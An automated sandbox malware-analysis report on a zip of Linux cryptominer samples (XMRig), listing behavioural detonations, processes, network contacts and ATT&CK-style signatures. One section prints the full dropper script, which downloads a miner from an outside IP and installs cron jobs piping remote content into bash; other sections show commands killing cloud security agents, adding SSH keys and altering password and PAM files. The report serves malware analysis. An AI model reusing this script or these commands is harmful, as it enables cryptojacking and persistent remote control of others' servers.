Malware Analysis Report

2025-01-02 07:03

Sample ID 241126-pwt9xa1pdt
Target hoze样本.zip
SHA256 747091fd60a9c41ff26d3878bac923c9c14b5472238874754577e14d47b8cba7
Tags
defense_evasion discovery execution persistence privilege_escalatio antivm credential_access privilege_escalation miner xmrig xmrig_linux
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

747091fd60a9c41ff26d3878bac923c9c14b5472238874754577e14d47b8cba7

Threat Level: Known bad

The file hoze样本.zip was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery execution persistence privilege_escalatio antivm credential_access privilege_escalation miner xmrig xmrig_linux

Xmrig_linux family

xmrig

Xmrig family

XMRig Miner payload

Modifies password files for system users/ groups

Adds new SSH keys

OS Credential Dumping

Modifies PAM framework files

File and Directory Permissions Modification

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

Deletes log files

Checks hardware identifiers (DMI)

Write file to user bin folder

Creates/modifies Cron job

Attempts to change immutable files

Adds a user to the system

Reads hardware information

Modifies special file permissions

Checks mountinfo of local process

Enumerates running processes

Reads process memory

Reads CPU attributes

Changes its process name

Checks CPU configuration

Enumerates kernel/hardware configuration

Reads runtime system information

System Network Configuration Discovery

Software Deployment Tools

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-11-26 12:41

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Xmrig family

xmrig

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

10s

Max time network

130s

Command Line

[/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/bash N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /etc/crontab /bin/bash N/A

Enumerates running processes

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/bin/pgrep N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pgrep N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/12/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/481/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1508/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/672/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/175/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/963/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1549/status /usr/bin/pgrep N/A
File opened for reading /proc/34/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/14/status /usr/bin/pgrep N/A
File opened for reading /proc/84/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/204/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1135/status /usr/bin/pgrep N/A
File opened for reading /proc/13/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/654/status /usr/bin/pgrep N/A
File opened for reading /proc/1236/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1337/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/22/status /usr/bin/pgrep N/A
File opened for reading /proc/9/status /usr/bin/pgrep N/A
File opened for reading /proc/79/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/418/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1078/status /usr/bin/pgrep N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/658/status /usr/bin/pgrep N/A
File opened for reading /proc/972/status /usr/bin/pgrep N/A
File opened for reading /proc/546/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/555/status /usr/bin/pgrep N/A
File opened for reading /proc/605/status /usr/bin/pgrep N/A
File opened for reading /proc/1017/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1337/status /usr/bin/pgrep N/A
File opened for reading /proc/1355/status /usr/bin/pgrep N/A
File opened for reading /proc/420/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1549/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/15/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1139/status /usr/bin/pgrep N/A
File opened for reading /proc/1148/status /usr/bin/pgrep N/A
File opened for reading /proc/1167/status /usr/bin/pgrep N/A
File opened for reading /proc/10/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1315/status /usr/bin/pgrep N/A
File opened for reading /proc/1508/status /usr/bin/pgrep N/A
File opened for reading /proc/16/status /usr/bin/pgrep N/A
File opened for reading /proc/170/status /usr/bin/pgrep N/A
File opened for reading /proc/1118/status /usr/bin/pgrep N/A
File opened for reading /proc/1103/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1157/status /usr/bin/pgrep N/A
File opened for reading /proc/1090/status /usr/bin/pgrep N/A
File opened for reading /proc/415/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1042/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1313/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/10/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/162/status /usr/bin/pgrep N/A
File opened for reading /proc/420/status /usr/bin/pgrep N/A
File opened for reading /proc/501/status /usr/bin/pgrep N/A
File opened for reading /proc/546/status /usr/bin/pgrep N/A
File opened for reading /proc/167/status /usr/bin/pgrep N/A
File opened for reading /proc/32/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/34/status /usr/bin/pgrep N/A
File opened for reading /proc/1313/status /usr/bin/pgrep N/A
File opened for reading /proc/1504/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/25/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/418/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1199/status /usr/bin/pgrep N/A
File opened for reading /proc/485/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1305/status /usr/bin/pgrep N/A
File opened for reading /proc/28/cmdline /usr/bin/pgrep N/A

Processes

/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8

[/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8 -c exec '/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8' "$@" /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8]

/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8

[/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8 -c
#!/bin/bash
ifrunning=$(pgrep xrx)
########################
########################
downloadminer(){
link1="http://185.252.178.82:6972/xrx/xrx"
link2="http://185.252.178.82:6972/configs/config-xrx.json"
mkdir /var/tmp/.xrx
cd /var/tmp/.xrx/
chattr -ia /var/tmp/.xrx/xrx
chattr -ia /var/tmp/.xrx/config.json
rm -rf /var/tmp/.xrx/xrx
rm -rf /var/tmp/.xrx/config.json
curl -L -O $link1 || cd1 -L -O $link1 || wget $link1 --no-check-certificate
curl -L -O $link2 || cd1 -L -O $link2 || wget $link2 --no-check-certificate
mv config-xrx.json config.json
chmod +x /var/tmp/.xrx/xrx
}
########################
########################
crontablegend(){
if (( $EUID != 0 )); then
if ! crontab -l | grep -q 'secure'; then
cd /dev/shm
rm -rf /dev/shm/.spark
echo "@daily /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark
sleep 1
echo "@reboot /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark
sleep 1
echo "1 * * * * /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark
sleep 1
echo "*/30 * * * * curl 185.252.178.82:1011/next | bash " >> .spark
sleep 1
echo "*/30 * * * * curl load.whitesnake.church:1011/next | bash " >> .spark
sleep 1
crontab .spark
sleep 2
rm -rf /dev/shm/.spark
fi
fi
if (( $EUID == 0 )); then
if ! cat /etc/crontab | grep -q 'secure'; then
echo "@daily root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab
echo "@reboot root /var/tmp/.xrx/init.sh hide >/dev/null 2>&1 & disown $* " >> /etc/crontab
echo "1 * * * * root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab
echo "*/30 * * * * root curl 185.252.178.82:1011/next | bash " >> /etc/crontab
echo "*/30 * * * * root curl load.whitesnake.church:1011/next | bash " >> /etc/crontab
fi
fi
}
########################
########################
gettingmineru(){
fsiz=`ls -l /var/tmp/.xrx/xrx | awk '{print $5}'`
if [ -f /var/tmp/.xrx/xrx ]; then
echo "miner intact"
else
echo "miner not found,downloading..."
downloadminer
fi
if [[ "$fsiz" -gt 0 ]]; then
echo "miner size intact"
else
echo "filesize 0,downloading..."
downloadminer
fi
}
########################
########################
gettingmineru
crontablegend
if test -z "$ifrunning" ; then
echo "xrx not running,starting..."
/var/tmp/.xrx/xrx </dev/null &>/dev/null & disown -h %1
sleep 1
echo -e "pid:"
pgrep xrx
fi
/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8]

/usr/bin/pgrep

[pgrep xrx]

/usr/bin/awk

[awk {print $5}]

/bin/ls

[ls -l /var/tmp/.xrx/xrx]

/bin/mkdir

[mkdir /var/tmp/.xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/config.json]

/bin/rm

[rm -rf /var/tmp/.xrx/xrx]

/bin/rm

[rm -rf /var/tmp/.xrx/config.json]

/usr/bin/curl

[curl -L -O http://185.252.178.82:6972/xrx/xrx]

/usr/bin/wget

[wget http://185.252.178.82:6972/xrx/xrx --no-check-certificate]

/usr/bin/curl

[curl -L -O http://185.252.178.82:6972/configs/config-xrx.json]

/usr/bin/wget

[wget http://185.252.178.82:6972/configs/config-xrx.json --no-check-certificate]

/bin/mv

[mv config-xrx.json config.json]

/bin/chmod

[chmod +x /var/tmp/.xrx/xrx]

/bin/mkdir

[mkdir /var/tmp/.xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/config.json]

/bin/rm

[rm -rf /var/tmp/.xrx/xrx]

/bin/rm

[rm -rf /var/tmp/.xrx/config.json]

/usr/bin/curl

[curl -L -O http://185.252.178.82:6972/xrx/xrx]

/usr/bin/wget

[wget http://185.252.178.82:6972/xrx/xrx --no-check-certificate]

/usr/bin/curl

[curl -L -O http://185.252.178.82:6972/configs/config-xrx.json]

/usr/bin/wget

[wget http://185.252.178.82:6972/configs/config-xrx.json --no-check-certificate]

/bin/mv

[mv config-xrx.json config.json]

/bin/chmod

[chmod +x /var/tmp/.xrx/xrx]

/bin/grep

[grep -q secure]

/bin/cat

[cat /etc/crontab]

/bin/sleep

[sleep 1]

/var/tmp/.xrx/xrx

[/var/tmp/.xrx/xrx]

/usr/bin/pgrep

[pgrep xrx]

Network

Country  Destination           Domain                    Proto
N/A      224.0.0.251:5353                                udp
IT       185.252.178.82:6972                             tcp
IT       185.252.178.82:6972                             tcp
GB       185.125.188.61:443                              tcp
GB       185.125.188.61:443                              tcp
US       151.101.193.91:443                              tcp
US       151.101.193.91:443                              tcp
IT       185.252.178.82:6972                             tcp
IT       185.252.178.82:6972                             tcp
GB       195.181.164.14:443                              tcp
IT       185.252.178.82:6972                             tcp
IT       185.252.178.82:6972                             tcp
IT       185.252.178.82:6972                             tcp
IT       185.252.178.82:6972                             tcp

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

debian9-armhf-20240729-en

Max time kernel

2s

Command Line

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/28/stat /usr/bin/killall N/A
File opened for reading /proc/266/stat /usr/bin/killall N/A
File opened for reading /proc/638/cmdline /usr/bin/killall N/A
File opened for reading /proc/134/stat /usr/bin/killall N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/148/stat /usr/bin/killall N/A
File opened for reading /proc/7/stat /usr/bin/killall N/A
File opened for reading /proc/43/stat /usr/bin/killall N/A
File opened for reading /proc/631/stat /usr/bin/killall N/A
File opened for reading /proc/24/stat /usr/bin/killall N/A
File opened for reading /proc/18/stat /usr/bin/killall N/A
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/218/stat /usr/bin/killall N/A
File opened for reading /proc/108/cmdline /usr/bin/killall N/A
File opened for reading /proc/643/stat /usr/bin/killall N/A
File opened for reading /proc/578/stat /usr/bin/killall N/A
File opened for reading /proc/134/cmdline /usr/bin/killall N/A
File opened for reading /proc/25/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /usr/bin/killall N/A
File opened for reading /proc/134/cmdline /usr/bin/killall N/A
File opened for reading /proc/163/stat /usr/bin/killall N/A
File opened for reading /proc/308/stat /usr/bin/killall N/A
File opened for reading /proc/266/stat /usr/bin/killall N/A
File opened for reading /proc/643/cmdline /usr/bin/killall N/A
File opened for reading /proc/27/stat /usr/bin/killall N/A
File opened for reading /proc/583/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/218/stat /usr/bin/killall N/A
File opened for reading /proc/662/stat /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/26/stat /usr/bin/killall N/A
File opened for reading /proc/75/stat /usr/bin/killall N/A
File opened for reading /proc/27/stat /usr/bin/killall N/A
File opened for reading /proc/665/cmdline /usr/bin/killall N/A
File opened for reading /proc/137/stat /usr/bin/killall N/A
File opened for reading /proc/147/stat /usr/bin/killall N/A
File opened for reading /proc/268/stat /usr/bin/killall N/A
File opened for reading /proc/670/stat /usr/bin/killall N/A
File opened for reading /proc/10/stat /usr/bin/killall N/A
File opened for reading /proc/75/stat /usr/bin/killall N/A
File opened for reading /proc/147/stat /usr/bin/killall N/A
File opened for reading /proc/10/stat /usr/bin/killall N/A
File opened for reading /proc/26/stat /usr/bin/killall N/A
File opened for reading /proc/97/stat /usr/bin/killall N/A
File opened for reading /proc/582/stat /usr/bin/killall N/A
File opened for reading /proc/29/stat /usr/bin/killall N/A
File opened for reading /proc/665/cmdline /usr/bin/killall N/A
File opened for reading /proc/25/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/134/cmdline /usr/bin/killall N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/308/stat /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A
File opened for reading /proc/134/cmdline /usr/bin/killall N/A
File opened for reading /proc/216/stat /usr/bin/killall N/A
File opened for reading /proc/266/stat /usr/bin/killall N/A
File opened for reading /proc/637/cmdline /usr/bin/killall N/A
File opened for reading /proc/41/stat /usr/bin/killall N/A
File opened for reading /proc/582/stat /usr/bin/killall N/A
File opened for reading /proc/666/stat /usr/bin/killall N/A
File opened for reading /proc/670/stat /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/bin/grep

[grep Gentoo]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

N/A

Files

N/A

Analysis: behavioral14

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\1AAF1A9F7877DC2C899D910A52F67F31.tar"

Signatures

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of AdjustPrivilegeToken

Description                Indicator  Process                          Target
Token: SeRestorePrivilege  N/A        C:\Program Files\7-Zip\7zFM.exe  N/A
Token: 35                  N/A        C:\Program Files\7-Zip\7zFM.exe  N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Processes

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\1AAF1A9F7877DC2C899D910A52F67F31.tar"

Network

N/A

Files

N/A

Analysis: behavioral21

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

debian9-mipsbe-20240729-en

Max time kernel

141s

Command Line

[/tmp/xrx/scp]

Signatures

N/A

Processes

/tmp/xrx/scp

[/tmp/xrx/scp]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

Network

N/A

Files

N/A

Analysis: behavioral26

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

debian9-mipsbe-20240418-en

Max time kernel

2s

Command Line

[/tmp/xrx/uninstall.sh]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/330/stat /usr/bin/killall N/A
File opened for reading /proc/737/stat /usr/bin/killall N/A
File opened for reading /proc/2/stat /usr/bin/killall N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/124/cmdline /usr/bin/killall N/A
File opened for reading /proc/740/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/705/stat /usr/bin/killall N/A
File opened for reading /proc/156/stat /usr/bin/killall N/A
File opened for reading /proc/327/stat /usr/bin/killall N/A
File opened for reading /proc/3/stat /usr/bin/killall N/A
File opened for reading /proc/16/stat /usr/bin/killall N/A
File opened for reading /proc/420/stat /usr/bin/killall N/A
File opened for reading /proc/75/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /usr/bin/killall N/A
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/156/stat /usr/bin/killall N/A
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/76/stat /usr/bin/killall N/A
File opened for reading /proc/172/stat /usr/bin/killall N/A
File opened for reading /proc/359/stat /usr/bin/killall N/A
File opened for reading /proc/16/stat /usr/bin/killall N/A
File opened for reading /proc/332/stat /usr/bin/killall N/A
File opened for reading /proc/741/cmdline /usr/bin/killall N/A
File opened for reading /proc/124/cmdline /usr/bin/killall N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/153/stat /usr/bin/killall N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/741/cmdline /usr/bin/killall N/A
File opened for reading /proc/124/stat /usr/bin/killall N/A
File opened for reading /proc/10/stat /usr/bin/killall N/A
File opened for reading /proc/740/stat /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/667/stat /usr/bin/killall N/A
File opened for reading /proc/18/stat /usr/bin/killall N/A
File opened for reading /proc/16/stat /usr/bin/killall N/A
File opened for reading /proc/10/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/72/stat /usr/bin/killall N/A
File opened for reading /proc/124/stat /usr/bin/killall N/A
File opened for reading /proc/667/stat /usr/bin/killall N/A
File opened for reading /proc/737/stat /usr/bin/killall N/A
File opened for reading /proc/79/stat /usr/bin/killall N/A
File opened for reading /proc/768/stat /usr/bin/killall N/A
File opened for reading /proc/735/stat /usr/bin/killall N/A
File opened for reading /proc/738/stat /usr/bin/killall N/A
File opened for reading /proc/741/stat /usr/bin/killall N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/24/stat /usr/bin/killall N/A
File opened for reading /proc/741/stat /usr/bin/killall N/A
File opened for reading /proc/741/cmdline /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/123/stat /usr/bin/killall N/A
File opened for reading /proc/3/stat /usr/bin/killall N/A
File opened for reading /proc/79/stat /usr/bin/killall N/A
File opened for reading /proc/385/stat /usr/bin/killall N/A
File opened for reading /proc/701/stat /usr/bin/killall N/A
File opened for reading /proc/705/stat /usr/bin/killall N/A
File opened for reading /proc/730/cmdline /usr/bin/killall N/A
File opened for reading /proc/720/stat /usr/bin/killall N/A
File opened for reading /proc/730/cmdline /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/xrx/uninstall.sh

[/tmp/xrx/uninstall.sh]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/bin/grep

[grep Gentoo]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

N/A

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

0s

Max time network

132s

Command Line

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Signatures

N/A

Processes

/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Network

Country  Destination           Domain                    Proto
GB       185.125.188.61:443                              tcp
GB       185.125.188.62:443                              tcp
US       151.101.193.91:443                              tcp
US       151.101.193.91:443                              tcp
N/A      224.0.0.251:5353                                udp
GB       89.187.167.3:443                                tcp
US       1.1.1.1:53            1527653184.rsc.cdn77.org  udp
US       1.1.1.1:53            1527653184.rsc.cdn77.org  udp
GB       89.187.167.38:443     1527653184.rsc.cdn77.org  tcp

Files

N/A

Analysis: behavioral16

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

0s

Max time network

132s

Command Line

[/tmp/xrx/chattr]

Signatures

N/A

Processes

/tmp/xrx/chattr

[/tmp/xrx/chattr]

Network

Country  Destination           Domain                    Proto
N/A      224.0.0.251:5353                                udp

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

149s

Max time network

132s

Command Line

[/tmp/xrx/init0]

Signatures

Adds new SSH keys

persistence privilege_escalation
Description Indicator Process Target
File opened for modification /root/.ssh/authorized_keys /usr/bin/cp N/A

Modifies password files for system users/ groups

persistence credential_access defense_evasion
Description Indicator Process Target
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/group /usr/sbin/useradd N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/useradd N/A
File opened for modification /etc/shadow /usr/sbin/useradd N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/gshadow /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/gshadow /usr/sbin/useradd N/A
File opened for modification /etc/group /usr/sbin/usermod N/A

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A

Modifies PAM framework files

persistence credential_access defense_evasion
Description Indicator Process Target
File opened for modification /etc/pam.d/common-auth /bin/bash N/A

OS Credential Dumping

credential_access
Description Indicator Process Target
File opened for reading /etc/shadow /usr/sbin/dpkg-preconfigure N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/bin/sudo N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/bin/chattr N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/bin/sudo N/A
File opened for reading /etc/shadow /usr/sbin/useradd N/A

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

privilege_escalation defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/sudo N/A
